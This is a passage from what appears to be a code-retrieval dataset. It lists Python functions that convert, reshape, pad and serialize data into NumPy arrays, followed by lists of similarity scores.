data_for_sorting():\n return RaggedArray([[1, 0], [2, 0], [0, 0]])", "def as_numpy_array_2D(self):\n wx = []\n wy = []\n for wp in self.waypoints:\n wx.append(wp.location.x)\n wy.append(wp.location.y)\n return np.array([wx, wy])", "def getIntArray2D(self) -> 
typing.List[typing.List[int]]:\n ...", "def flatten_data(X):\n\n return X.reshape((-1, X.shape[-1]))", "def enforce_2D(self,):\n for data in (self.data_obs,self.data_fcst):\n shp = data.shape\n if len(shp) == 2:\n pass \n elif len(shp) == 3:\n if shp[0] == 0:\n data = data[0,:,:]\n elif len(shp) == 4:\n if (shp[0] == 0) and (shp[1] == 0):\n data = data[0,0,:,:]\n else:\n raise FormatError(\"Data needs to be 2D.\")\n return", "def normalize_data(data, n=1):\n\n if isinstance(data, str):\n # TODO: could Antti comment on this?\n # numpy array initialization works unintuitively with strings\n data = np.array([[data]], dtype=object)\n else:\n data = np.atleast_1d(data)\n\n if data.ndim == 1:\n if data.shape[0] == n:\n data = data[:, None]\n else:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n else:\n if data.shape[0] != n:\n data = data[None, :]\n if n > 1:\n data = np.vstack((data, ) * n)\n return data", "def _reshape(self, data):\n\n\t\td = np.zeros((32,32,3))\n\t\td_r = data[0:1024].reshape(32,32)\n\t\td_g = data[1024:2048].reshape(32,32)\n\t\td_b = data[2048:].reshape(32,32)\n\n\t\tfor h in range(32):\n\t\t for w in range(32):\n\t\t for c in range(3):\n\n\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\tarray = np.array(d, dtype=np.uint8)\n\t\timg = Image.fromarray(array)\n\t\ttemp = img.resize(size = (64,64))\n\t\td = image.img_to_array(temp)\n\n\t\t#plt.imshow(d)\n\t\t#plt.show()\n\t\treturn d", "def __new__(cls, data):\n arr = np.array(data, dtype=np.float64)\n if arr.shape[1] != 2:\n raise ValueError(\"data must be Nx2 array\")\n\n return arr.view(cls)", "def _convert_data(self, data):\n if isinstance(data, Tensor):\n data = data.asnumpy()\n elif isinstance(data, list):\n data = np.array(data)\n elif isinstance(data, np.ndarray):\n pass\n else:\n raise TypeError('Input data type must be tensor, list or numpy.ndarray')\n return data", "def make_homogeneous(points):\n return np.hstack((points, np.ones((points.shape[0], 1))))", "def make_ndarray(data: list, convert=False):\n data_height = data[0].shape[0]\n data_width = data[0].shape[1]\n if len(data[0].shape) == 3:\n data_channels = data[0].shape[2]\n nd_data = np.zeros((len(data), data_height, data_width, data_channels), dtype=np.float32)\n\n else:\n nd_data = np.zeros((len(data), data_height, data_width), dtype=np.float32)\n\n if convert:\n for _ in range(len(data)):\n nd_data[_] = tf.keras.layers.Lambda(lambda x: x / 255)(data[_])\n\n else:\n for _ in range(len(data)):\n nd_data[_] = data[_]\n\n return nd_data", "def dataset_as_arrays(dataset):\r\n scores = []\r\n lenghts = []\r\n embeddings = []\r\n for row in dataset:\r\n embeddings += [vec for vec in row[0]]\r\n scores.append(float(row[1]))\r\n lenghts.append(row[0].shape[0])\r\n \r\n embeddings = numpy.array(embeddings)\r\n scores = numpy.array(scores)\r\n lenghts = numpy.array(lenghts)\r\n return embeddings, scores, lenghts", "def buffer_data_numpy(self) -> np.ndarray:\n # mask the last 4 bytes to reduce pixel format to mono/color mode and bit width info\n pixel_format = self.data.pixelFormat & 0xFFFF0000\n try:\n arr_dtype, arr_channels = PIXELFORMAT_TO_DTYPE_CHANNELS[pixel_format]\n except KeyError as ex:\n raise NotImplementedError('Pixel format not supported!') from ex\n\n arr_shape = (self.data.height, self.data.width, arr_channels) if arr_channels > 1 \\\n else (self.data.height, self.data.width)\n\n return np.ndarray(buffer=self.buffer_data(),\n dtype=arr_dtype,\n shape=arr_shape)", 
"def generate_2D(X):\n\n\tno_of_images = len(X)\n\tdata = np.zeros((no_of_images, 28, 28))\n\n\tfor i in xrange(no_of_images):\n\t\tdata[i] = np.copy(X[i].reshape(28, 28))\n\n\treturn data", "def flatten(self):\n xv, yv = np.meshgrid(self.columns, self.index, indexing='xy')\n return np.array([xv.ravel(), yv.ravel(), self.values.ravel()])", "def _make_2x2(self, A11, A12, A21, A22, dtype=float):\n array = np.empty((2,2), dtype=dtype)\n array[0,0] = A11\n array[0,1] = A12\n array[1,0] = A21\n array[1,1] = A22\n return array", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n if self._validate:\n if len(data.shape) <= 1:\n raise DataProcessorError(\n \"The data should be an array with at least two dimensions.\"\n )\n\n return data", "def convert_to_ndarray(entity):\n if isinstance(entity, np.ndarray) and entity.dtype.kind in set('biufc'):\n # entity is numerical ndarray already\n return entity\n if isinstance(entity, np.ndarray) and isinstance(entity.flat[0], qt.Qobj):\n # entity is output from qt.eigenstates\n return convert_esys_to_ndarray(entity)\n if isinstance(entity, list) and isinstance(entity[0], np.ndarray) and isinstance(entity[0].flat[0], qt.Qobj):\n # entity is a list of qt.eigenstates\n return np.asarray([convert_esys_to_ndarray(entry) for entry in entity])\n # possibly we have a list of numerical values or a list of ndarrays\n converted_entity = np.asarray(entity)\n if converted_entity.dtype.kind not in set('biufc'):\n raise TypeError('Unable to convert data to numerical numpy array: ', entity)\n return converted_entity", "def _reshape(self, data):\n\n\t\t\td = np.zeros((32,32,3))\n\t\t\td_r = data[0:1024].reshape(32,32)\n\t\t\td_g = data[1024:2048].reshape(32,32)\n\t\t\td_b = data[2048:].reshape(32,32)\n\n\t\t\tfor h in range(32):\n\t\t\t for w in range(32):\n\t\t\t for c in range(3):\n\n\t\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\t\tarray = np.array(d, dtype=np.uint8)\n\t\t\timg = Image.fromarray(array)\n\t\t\ttemp = img.resize(size = (64,64))\n\t\t\td = image.img_to_array(temp)\n\n\t\t\t#plt.imshow(d)\n\t\t\t#plt.show()\n\t\t\treturn d", "def getFloatArray2D(self) -> typing.List[typing.List[float]]:\n ...", "def _format_data(self, data: np.ndarray) -> np.ndarray:\n self._n_shots = 0\n\n # identify shape\n try:\n # level1 single-shot data\n self._n_circs, self._n_shots, self._n_slots, self._n_iq = data.shape\n except ValueError:\n try:\n # level1 data averaged over shots\n self._n_circs, self._n_slots, self._n_iq = data.shape\n except ValueError as ex:\n raise DataProcessorError(\n f\"Data given to {self.__class__.__name__} is not likely level1 data.\"\n ) from ex\n\n if self._validate:\n if data.shape[-1] != 2:\n raise DataProcessorError(\n f\"IQ data given to {self.__class__.__name__} must be a multi-dimensional array\"\n \"of dimension [d0, d1, ..., 2] in which the last dimension \"\n \"corresponds to IQ elements.\"\n f\"Input data contains element with length {data.shape[-1]} != 2.\"\n )\n\n return data", "def _serialize(self, data):\n data = [np.array(j) for j in data]\n self._data_shape_list = [j.shape for j in data]\n serialized_data = [j.ravel() for j in data]\n serialized_data = np.hstack(serialized_data)\n return serialized_data", "def read_2D_comsol_data(self):\n x=[]\n y=[]\n z=[]\n with open(self.file, 'r') as rf:\n reader = csv.reader(rf, delimiter=',')\n for row in reader:\n x.append(row[0])\n y.append(row[1])\n z.append(row[2])\n x = np.asarray((x),dtype=float)\n y = 
np.asarray((y),dtype=float)\n z = np.asarray((z),dtype=float)\n return x,y,z", "def to_array(self):\n W = self.W\n theta = self.theta\n X = self.X\n Z = np.dot(X, W)\n Y = np.array(self.Y)\n num_samples = X.shape[0]\n K = self.kern.K(X) + self.likelihood.variance * np.eye(num_samples)\n L = scipy.linalg.cho_factor(K, lower=True)\n b = scipy.linalg.cho_solve(L, Y).flatten()\n Ki = scipy.linalg.cho_solve(L, np.eye(num_samples))\n tmp = []\n tmp.append(W.flatten())\n tmp.append(Z.flatten())\n tmp.append(b.flatten())\n tmp.append(Ki.flatten())\n tmp.append(theta.flatten())\n num_input = self.input_dim\n num_samples = self.num_data\n num_active = W.shape[1]\n return np.hstack([[num_input, num_samples, num_active],\n np.hstack(tmp), [self.Y_mean, self.Y_std]])", "def get_field_array(self):\n array_j = []\n array_i = []\n n = 3\n i = self.square_size_y / 2\n while i <= self.field_height:\n if n % 2 == 1:\n j = self.square_size_x / 2\n while j <= self.field_width:\n array_j.append((j, i))\n j += self.square_size_x\n array_i.append(array_j)\n array_j = []\n n += 1\n else:\n j = 0\n while j <= self.field_width:\n array_j.append((j, i))\n j += self.square_size_x\n array_i.append(array_j)\n array_j = []\n n += 1\n i += self.square_size_y\n self.array = array_i\n return array_i", "def getShortArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def _raw_to_arrays(self):\n self.update_geometry()\n if isinstance(self, Molecule):\n # normal qcdb.Molecule\n geom = self.geometry(np_out=True)\n else:\n # psi4.core.Molecule\n geom = np.array(self.geometry())\n mass = np.asarray([self.mass(at) for at in range(self.natom())])\n elem = np.asarray([self.symbol(at) for at in range(self.natom())])\n elez = np.asarray([self.Z(at) for at in range(self.natom())])\n uniq = np.asarray(\n [hashlib.sha1((str(elem[at]) + str(mass[at])).encode('utf-8')).hexdigest() for at in range(self.natom())])\n\n return geom, mass, elem, elez, uniq", "def transform(self, chunks):\n data = np.array([chunk.flatten() for chunk in chunks])\n\n return data", "def as_2d_array(theta):\n v = theta.view(np.float)\n N = theta.shape[0]\n v.shape = (N, - 1)\n # raise an error if v cannot be reshaped without creating a copy\n return v", "def _convert_to_np_array(inputs: Union[float, Tuple[float], np.ndarray], dim):\n outputs = None\n if isinstance(inputs, (tuple, np.ndarray)):\n outputs = np.array(inputs)\n else:\n outputs = np.full(dim, inputs)\n\n if len(outputs) != dim:\n raise ValueError(\"The inputs array has a different dimension {}\"\n \" than provided, which is {}.\".format(len(outputs), dim))\n\n return outputs", "def _convert_to_np_array(inputs: Union[float, Tuple[float], np.ndarray], dim):\n outputs = None\n if isinstance(inputs, (tuple, np.ndarray)):\n outputs = np.array(inputs)\n else:\n outputs = np.full(dim, inputs)\n\n if len(outputs) != dim:\n raise ValueError(\"The inputs array has a different dimension {}\"\n \" than provided, which is {}.\".format(len(outputs), dim))\n\n return outputs", "def _to_arrays(particle, count: int):\n if (\n isinstance(particle, np.ndarray)\n and len(particle.shape) == 2\n and particle.shape[0] == 4\n ):\n # Multiple particles provided\n return particle\n\n elif len(particle) == 4:\n # One particle\n out = np.zeros((4, count))\n out[0] += particle[0]\n out[1] += particle[1]\n out[2] += particle[2]\n out[3] += particle[3]\n\n return out\n\n raise ValueError(\n f\"target shape invalid: should either be a length-4 iterable [x, y, z, t] or a shape (4, N) array\\nGot {type(particle)}\"\n )", "def 
_data_with_axis(self, axis):\n shpl = list(self.data.shape)\n \n if len(shpl) == 2:\n shpl[1] += 1\n shp = tuple(shpl)\n data = numpy.zeros(shp,dtype=self.data.dtype)\n data[:,1:] = self.data\n data[:,0] = axis.data \n elif len(shpl) == 1:\n shpl.append(2)\n shp = tuple(shpl)\n data = numpy.zeros(shp,dtype=self.data.dtype)\n data[:,1] = self.data\n data[:,0] = axis.data\n else:\n raise Exception(\"Other shapes than (N,) and (N,M) not implemented\")\n return data", "def fit_transform(self, x: Array2D) -> Array2D:", "def makearray(self, *args, **kwargs):\n return _image.image_makearray(self, *args, **kwargs)", "def _check_and_transform_input(self, data):\n if isinstance(data, list):\n if np.array(data).shape == (len(data),):\n if len(data) == 1:\n data = np.array(data).reshape(1, 1)\n data = np.array(data).reshape(len(data), 1)\n else:\n data = np.concatenate(data).reshape(len(data), -1)\n else:\n raise TypeError('Input data should be of type list, but found type {}'.format(type(data)))\n\n return data", "def make_data(self): \n s = numpy.arange(0.0, 10.0, 0.01)\n s = numpy.reshape(s, (10,10,10))\n s = numpy.transpose(s)\n\n v = numpy.zeros(3000, 'd')\n v[1::3] = 1.0\n v = numpy.reshape(v, (10,10,10,3))\n return s, v", "def n2m(a):\n if not isinstance(a, np.ndarray): a = np.array(a)\n return multiprocessing.Array(a.dtype.char, a.flat, lock=False), tuple(a.shape), a.dtype.char, isinstance(a, np.matrix)", "def getByteArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def reformat(dataset):\n x = dataset[:, 1] \n x = np.stack(x) # reshape to (n, mel bands, timesteps)\n x = np.expand_dims(np.moveaxis(x, 1, -1), axis=3) # reformat x to (n, timesteps, mel bands, 1) \n y = dataset[:, 2] \n y = np.moveaxis(np.stack(y), 1, -1) # reformat y to (n, timesteps, 8)\n return x, y", "def parse_array(data, mode):\n if data.ndim == 1:\n if mode == 'image':\n return data.reshape(-1, 1)\n if mode == 'curve':\n return (range(len(data)), data)\n if mode == 'loss':\n return (data, None)\n\n if data.ndim == 3:\n if mode in ('curve', 'loss'):\n msg = f\"In `mode={mode}` array must be 1- or 2-dimensional, got array with ndim={data.ndim}.\"\n raise ValueError(msg)\n\n if data.ndim > 3:\n if mode != 'histogram':\n msg = f\"In `mode={mode}` array must be 1-, 2- or 3-dimensional, got array with ndim={data.ndim}.\"\n raise ValueError(msg)\n\n return data", "def convert_to_array(self): \n self.reads = np.asarray(self.reads, dtype=\"int64\")\n self.sampling=True", "def numpy(self):\n return self.data", "def getLongArray2D(self) -> typing.List[typing.List[int]]:\n ...", "def package_density_matrices(y: Array) -> Array:\n # As written here, only works for (n,n) Arrays\n obj_arr = np.empty(shape=(1), dtype=\"O\")\n obj_arr[0] = y\n return obj_arr", "def flatten(self):\n return DataArray([s for s in self.unstructured()])", "def _deserialize(self, data):\n\n firstInd = 0\n deserialized_data = []\n for shp in self._data_shape_list:\n if len(shp) > 1:\n shift = np.prod(shp)\n elif len(shp) == 0:\n shift = 1\n else:\n shift = shp[0]\n tmp_array = data[firstInd:firstInd+shift]\n tmp_array = tmp_array.reshape(shp)\n deserialized_data.append(tmp_array)\n firstInd += shift\n return deserialized_data", "def _make_array(x):\n try:\n x = np.asfarray(x).squeeze()\n except ValueError:\n pass\n return x", "def _reshape(self, data):\n batch_size, height, width, n_channels = data.shape\n if self._grid_height:\n grid_height = self._grid_height\n else:\n grid_height = int(math.floor(math.sqrt(batch_size)))\n\n grid_width = 
int(math.ceil(batch_size/grid_height))\n\n if n_channels == 1:\n data = np.tile(data, (1, 1, 1, 3))\n n_channels = 3\n\n if n_channels != 3:\n raise ValueError('Image batch must have either 1 or 3 channels, but '\n 'was {}'.format(n_channels))\n\n shape = (height * grid_height, width * grid_width, n_channels)\n buf = np.full(shape, 255, dtype=np.uint8)\n multiplier = 1 if data.dtype in (np.int32, np.int64) else 255\n\n for k in range(batch_size):\n i = k // grid_width\n j = k % grid_width\n arr = data[k]\n x, y = i * height, j * width\n buf[x:x + height, y:y + width, :] = np.clip(\n multiplier * arr, 0, 255).astype(np.uint8)\n\n if self._zoom > 1:\n buf = buf.repeat(self._zoom, axis=0).repeat(self._zoom, axis=1)\n return buf" ]
[ "0.69984454", "0.69612616", "0.69326127", "0.68554795", "0.68044513", "0.6771031", "0.6694132", "0.6677301", "0.65618455", "0.64136314", "0.64136314", "0.6397039", "0.6386304", "0.63829464", "0.63655895", "0.63461405", "0.6290972", "0.6282495", "0.6213077", "0.6213077", "0.61537564", "0.61509496", "0.61224943", "0.61139107", "0.6036738", "0.60173273", "0.6012816", "0.60066086", "0.5985646", "0.5983536", "0.5980992", "0.5976893", "0.5964275", "0.59587497", "0.5955035", "0.5950386", "0.59471554", "0.59453475", "0.5924999", "0.59149164", "0.5909023", "0.5905758", "0.5897151", "0.58894324", "0.5884572", "0.5881802", "0.5880827", "0.5870219", "0.58357733", "0.5810608", "0.5808006", "0.57970107", "0.5790539", "0.5787517", "0.5786072", "0.5768794", "0.57639354", "0.57602423", "0.5760063", "0.575568", "0.57506335", "0.5742508", "0.57425076", "0.5732822", "0.5728535", "0.5727184", "0.5722537", "0.5718366", "0.5715984", "0.57127404", "0.56881016", "0.56844825", "0.5680941", "0.5680732", "0.56781816", "0.5677494", "0.56738234", "0.56737655", "0.56732917", "0.56701016", "0.5658189", "0.5655407", "0.5655407", "0.56543934", "0.56512415", "0.56500113", "0.56490517", "0.5644514", "0.56396914", "0.56305575", "0.5627493", "0.56242615", "0.56115645", "0.56092477", "0.56070733", "0.5605156", "0.5603914", "0.5597563", "0.5585879", "0.55851775", "0.5581067" ]
0.0
-1
Transform incoming data to a homogeneous 3d array.
def transform(self, X):
    n = len(X)
    Xt = self.pad_value * np.ones((n,) + self.max_size, dtype=self.dtype)
    for i, arr in enumerate(X):
        m = min(self.max_size[0], len(arr))
        if not m:
            continue
        arr = np.array(arr[:m], dtype=object)
        for j, vec in enumerate(arr):
            n = min(self.max_size[1], len(vec))
            Xt[i, j, :n] = vec[:n]
    return Xt
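The padding loop above is easiest to see in isolation. Below is a minimal runnable sketch under the assumption that the surrounding transformer exposes max_size (a (rows, cols) tuple), pad_value, and dtype attributes, as the method implies; the class name PadTo3D and its constructor are hypothetical scaffolding, not part of the original.

import numpy as np

# Hypothetical wrapper: only the attributes that transform() reads are assumed.
class PadTo3D:
    def __init__(self, max_size, pad_value=0, dtype=np.float64):
        self.max_size = max_size    # (max_rows, max_cols) per sample
        self.pad_value = pad_value  # fill value for padded entries
        self.dtype = dtype

    def transform(self, X):
        # Allocate one homogeneous block, pre-filled with the pad value.
        n = len(X)
        Xt = self.pad_value * np.ones((n,) + self.max_size, dtype=self.dtype)
        for i, arr in enumerate(X):
            m = min(self.max_size[0], len(arr))
            if not m:
                continue  # empty sample: leave the padding as-is
            for j, vec in enumerate(arr[:m]):
                k = min(self.max_size[1], len(vec))
                Xt[i, j, :k] = vec[:k]  # copy, truncating over-long rows
        return Xt

# Ragged input: samples differ in row count and row length.
X = [[[1, 2], [3]], [[4, 5, 6]]]
print(PadTo3D(max_size=(2, 3)).transform(X))
# [[[1. 2. 0.]
#   [3. 0. 0.]]
#  [[4. 5. 6.]
#   [0. 0. 0.]]]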
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cvt2array(tuples):\n rc = []\n for t in tuples:\n rc.append(point3d(np.float32(t[X]), np.float32(t[Y]), np.float32(t[Z])))\n return rc", "def mat_2d_to_3d(x, agg_num, hop):\n # Pad to at least one block. \n len_x, n_in = x.shape\n if (len_x < agg_num):\n x = np.concatenate((x, np.zeros((agg_num - len_x, n_in))))\n \n # Segment 2d to 3d. \n len_x = len(x)\n i1 = 0\n x3d = []\n while (i1 + agg_num <= len_x):\n x3d.append(x[i1 : i1 + agg_num])\n i1 += hop\n return np.array(x3d)", "def make_data(self, data):\n return array(data, dtype=float32)", "def convert_1d_to_3d(data_X, data_Y):\n\n data_X = data_X.tocsr()\n \n data_dim_x = [] # slices along x-axis (has shape of (total_trials * dim_x, dim_z, dim_y))\n data_dim_x_label = [] # contains (total_trials * dim_x) labels\n data_dim_y = [] # slices along y-axis (has shape of (total_trials * dim_y, dim_z, dim_x))\n data_dim_y_label = [] # contains (total_trials * dim_y) labels\n data_dim_z = [] # slices along z-axis (has shape of (total_trials * dim_z, dim_y, dim_x))\n data_dim_z_label = [] # contains (total_trials * dim_z) labels\n\n for num_trial in range(data_X.shape[0]):\n label = data_Y[num_trial]\n data_1d = data_X[num_trial]\n data_3d = np.squeeze(np.asarray(data_1d.todense())).reshape((dim_z, dim_y, dim_x))\n for x in range(dim_x):\n x_slice = data_3d[:,:,x]\n # append only if the slice is not empty \n if x_slice.sum() != 0:\n data_dim_x.append(data_3d[:, :, x])\n data_dim_x_label.append(label)\n for y in range(dim_y):\n y_slice = data_3d[:, y, :]\n if y_slice.sum() != 0:\n data_dim_y.append(data_3d[:, y, :])\n data_dim_y_label.append(label)\n for z in range(dim_z):\n z_slice = data_3d[:, :, z]\n if z_slice.sum() != 0:\n data_dim_z.append(data_3d[z, :, :])\n data_dim_z_label.append(label)\n\n return np.array(data_dim_x), np.array(data_dim_x_label), \\\n np.array(data_dim_y), np.array(data_dim_y_label), \\\n np.array(data_dim_z), np.array(data_dim_z_label)", "def _to_numpy_ndarray(cls, data):\n if isinstance(data, np.ndarray):\n return data\n arr = np.array(data, dtype=np.float)\n if len(arr.shape) == 1:\n arr = np.reshape(arr, newshape=(1, arr.shape[0]))\n return arr", "def _make_3d_series(x: np.ndarray) -> np.ndarray:\n num_dims = x.ndim\n if num_dims == 1:\n shape = x.shape\n _x = np.reshape(x, (shape[0], 1, 1))\n elif num_dims == 2:\n shape = x.shape\n _x = np.reshape(x, (shape[0], 1, shape[1]))\n elif num_dims > 3:\n raise ValueError(\n \"The matrix provided has more than 3 dimensions. This is not\"\n \"supported. 
Please provide a matrix with less than \"\n \"3 dimensions\"\n )\n else:\n _x = x\n return _x", "def augment_data(self,data):\n d = np.empty([data.shape[0]+2,data.shape[1]+2])\n d[1:-1,1:-1] = data\n d[0,1:-1] = data[0,:]\n d[1:-1,0] = data[:,0]\n d[-1,1:-1] = data[-1,:]\n d[1:-1,-1] = data[:,-1]\n d[0,0] = data[0,0]\n d[-1,-1] = data[-1,-1]\n d[0,-1] = data[0,-1]\n d[-1,0] = data[-1,0]\n return d", "def GPy_reformat_3D(array):\r\n n_timesteps = np.shape(array)[-1]\r\n if len(np.shape(array)) == 1:\r\n array = array.reshape(n_timesteps, 1)\r\n return [array, array, array]\r\n elif len(np.shape(array)) == 2:\r\n array = array.T\r\n array1 = array[:, 0, None]\r\n array2 = array[:, 1, None]\r\n array3 = array[:, 2, None]\r\n return [array1, array2, array3]\r\n else:\r\n return print(\"Error in GPy_reformat, input array is wrong shape.\")", "def torchlike_data(data):\n\n #Inputun kanal değeri alınır\n n_channels = data.shape[2] ### 3\n # print(\"n_channels=\", n_channels) #(224,224,3)\n\n #Inputla benzer türde ve boyutta boş bir dizi oluşturuluyor.\n torchlike_data_output = np.empty((n_channels,data.shape[0],data.shape[1]))\n # print(\"torchlike_data_output\",torchlike_data_output[0])\n \n #print(\"xxxxxxxxxxxxxxx\",torchlike_data_output[0].shape) \n #\n #\n #numpy.empty(shape, dtype=float, order='C', *, like=None)\n \n \n #her kanal için\n for i in range(n_channels):\n \n #datanın niçindeki veriler torchlika_data_output a aktarılır\n torchlike_data_output[i] = data[:,:,i]\n return torchlike_data_output", "def transform3D(x: float, y: float, z: float, R: np.array) -> np.array:\n T = np.zeros((4, 4))\n T[:3, :3] = R\n T[:, 3] = [x, y, z, 1.0]\n\n return T", "def split_3d_array_into_channels(arr):\n return [arr[:, :, i] for i in range(arr.shape[-1])]", "def funcify_3d(arrayin, func2d):\r\n assert(len(arrayin.shape) >= 2)\r\n elem = arrayin.size / (arrayin.shape[-1] * arrayin.shape[-2])\r\n if elem == 2 :\r\n arrayout = func2d(arrayin)\r\n else :\r\n array = arrayin.flatten().reshape( (elem, arrayin.shape[-2], arrayin.shape[-1]))\r\n arrayout = []\r\n for i in range(elem):\r\n arrayout.append(func2d(array[i]))\r\n arrayout = np.array(arrayout).reshape( arrayin.shape )\r\n return arrayout", "def process(self, data):\n data = np.atleast_2d(data)\n\n if self.orientation == 'row':\n return data\n else:\n return data.T", "def carla_xyz_to_ndarray(xyz: Any) -> np.ndarray:\n return np.asarray(\n [xyz.x, xyz.y, xyz.z],\n dtype=np.float32,\n )", "def make_data(self): \n s = numpy.arange(0.0, 10.0, 0.01)\n s = numpy.reshape(s, (10,10,10))\n s = numpy.transpose(s)\n\n v = numpy.zeros(3000, 'd')\n v[1::3] = 1.0\n v = numpy.reshape(v, (10,10,10,3))\n return s, v", "def _reshape(self, data):\n\n\t\td = np.zeros((32,32,3))\n\t\td_r = data[0:1024].reshape(32,32)\n\t\td_g = data[1024:2048].reshape(32,32)\n\t\td_b = data[2048:].reshape(32,32)\n\n\t\tfor h in range(32):\n\t\t for w in range(32):\n\t\t for c in range(3):\n\n\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\tarray = np.array(d, dtype=np.uint8)\n\t\timg = Image.fromarray(array)\n\t\ttemp = img.resize(size = (64,64))\n\t\td = image.img_to_array(temp)\n\n\t\t#plt.imshow(d)\n\t\t#plt.show()\n\t\treturn d", "def reshape_tensor3d(self, x):\n if self.dim_ordering == 'th':\n tx = K.reshape(x, (-1, self.nb_filter, self.cols * self.rows))\n else:\n tx = K.reshape(x, (-1, self.cols * self.rows, self.nb_filter))\n tx = K.transpose(tx, (0,2,1))\n if self.cov_mode == 'channel' or self.cov_mode 
=='mean' or self.cov_mode =='pmean':\n return tx\n else:\n return K.transpose(tx, (0,2,1))", "def config_to_array(data):\n return np.array(data[\"data\"]).reshape(data[\"rows\"], data[\"cols\"])", "def _reshape(self, data):\n\n\t\t\td = np.zeros((32,32,3))\n\t\t\td_r = data[0:1024].reshape(32,32)\n\t\t\td_g = data[1024:2048].reshape(32,32)\n\t\t\td_b = data[2048:].reshape(32,32)\n\n\t\t\tfor h in range(32):\n\t\t\t for w in range(32):\n\t\t\t for c in range(3):\n\n\t\t\t if c == 0 : d[h,w,c] = d_r[h,w]\n\t\t\t elif c == 1 : d[h,w,c] = d_g[h,w]\n\t\t\t else : d[h,w,c] = d_b[h,w]\n\n\t\t\tarray = np.array(d, dtype=np.uint8)\n\t\t\timg = Image.fromarray(array)\n\t\t\ttemp = img.resize(size = (64,64))\n\t\t\td = image.img_to_array(temp)\n\n\t\t\t#plt.imshow(d)\n\t\t\t#plt.show()\n\t\t\treturn d", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def get_data(data):\n\n np_data = np.array(data)\n array = []\n\n for i in range(0, np_data.shape[1]):\n array.append(np_data[:, i])\n\n return np.array(array)", "def reshape_tensor3d(self, x):\n if self.dim_ordering == 'th':\n tx = K.reshape(x, (-1, self.nb_filter, self.cols * self.rows))\n else:\n tx = K.reshape(x, (-1, self.cols * self.rows, self.nb_filter))\n tx = K.transpose(tx, (0, 2, 1))\n if self.bilinear_mode == 'channel' or self.bilinear_mode == 'mean' or self.bilinear_mode == 'pmean':\n return tx\n else:\n return K.transpose(tx, (0, 2, 1))", "def flatten_array(self):\n numel = self.xyz_array[:, :, 0].size # Number of elements in dataset\n self.flat_array = np.zeros([self._len_z, numel]) # Create array to hold flattened array\n\n # Loop through each dimension (dataset) and flatten it into new array\n for dim in range(self._len_z):\n self.flat_array[dim, :] = np.ravel(self.xyz_array[:, :, dim])", "def Reshape(xdata, ydata, zdata):\r\n N = zdata.shape[0]\r\n Nx = list(ydata).count(ydata[0])\r\n Ny = N/Nx\r\n zz = np.copy(zdata)\r\n zz.shape = (Ny,Nx)\r\n xx = xdata[:Nx]\r\n yy = np.zeros(Ny)\r\n for u in range(Ny):\r\n yy[u] = ydata[Nx*u]\r\n return xx,yy,zz", "def transform(self, data):\n unflattened = [unflatten_vec(d) for d in data]\n return numpy.array([self.signature(uf)\n for uf in unflattened])", "def split_3Darray(array2d, L_window):\n N, ch = array2d.shape\n n_windows = N//L_window\n array3d = np.zeros((n_windows, L_window, ch))\n for i in range(n_windows):\n array3d[i]=array2d[i*L_window: (i+1)*L_window,:] \n \n return array3d", "def ndarray_to_vector3d(array: np.ndarray) -> carla.Vector3D: # pylint: disable=no-member\n return carla.Vector3D(*list(map(float, array))) # pylint: disable=no-member", "def data_reshape(image):\n image_mat = []\n if image.shape[-1] == 3:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j[0], j[1], j[2]])\n else:\n for x, i in enumerate(image):\n for y, j in enumerate(i):\n image_mat.append([x, y, j])\n return np.array(image_mat)", "def dataConvertToNumpy( self ):\n self.featureNumpy = np.asarray( self.feature )\n self.ClassNumpy = np.asarray( self.Class )", "def _to_ndarray(data):\n return np.atleast_1d(getattr(data, 'values', data))", "def to_numpy(data):\n fields = [\n \"x\", \"y\", \"z\",\n \"proximity\"\n ]\n return np.array([[row[field] for field in fields] for row in data])", "def nested_to_3d_numpy(X, a=None, b=None):\n return np.stack(\n X.iloc[a:b].applymap(lambda cell: cell.to_numpy()).apply(lambda row: np.stack(row), axis=1).to_numpy())", "def 
cube_data(self):\n cube_data = copy.deepcopy(self.data)\n cube_data.shape = [self.nints * self.ngroups, self.rows, self.columns]\n return cube_data", "def vertify(data: list):\n assert len(data) == 4\n n = [float(d) for d in data]\n return np.array([[n[0], n[1]], [n[2], n[1]], [n[2], n[3]], [n[0], n[3]], [n[0], n[1]]])", "def _build(self):\n ary = np.zeros( (3,3,3), float )\n ary[0,0,0] = ary[1,1,1] = ary[0,1,2] = ary[1,0,2] = 1.\n ary[0,2,0] = ary[0,2,2] = ary[2,0,0] = ary[2,0,2] = 0.5\n ary[1,2,1] = ary[1,2,2] = ary[2,1,1] = ary[2,1,2] = 0.5\n ary[2,2,0] = ary[2,2,1] = 0.25\n ary[2,2,2] = 0.5\n return ary", "def mesh_flatten(x):\r\n N, V, dims = x.shape\r\n\r\n mesh_data = x\r\n mesh_data = np.transpose(mesh_data, axes=[2,1,0])\r\n mesh_data = mesh_data.reshape(-1, N)\r\n return mesh_data", "def vector3(x, y, z):\n return np.array([x, y, z], dtype=float)", "def xyz(self) -> np.ndarray:\n return np.vstack((self.x, self.y, self.z)).transpose()", "def transform(self, data):\n self.cube = self.trf.transform(data)", "def reshape(data):\n return K.reshape(x=data, shape=(K.shape(data)[0], 1, reshape_size))", "def __array__(self):\n return np.asarray(self.data)", "def make_ndarray(data: list, convert=False):\n data_height = data[0].shape[0]\n data_width = data[0].shape[1]\n if len(data[0].shape) == 3:\n data_channels = data[0].shape[2]\n nd_data = np.zeros((len(data), data_height, data_width, data_channels), dtype=np.float32)\n\n else:\n nd_data = np.zeros((len(data), data_height, data_width), dtype=np.float32)\n\n if convert:\n for _ in 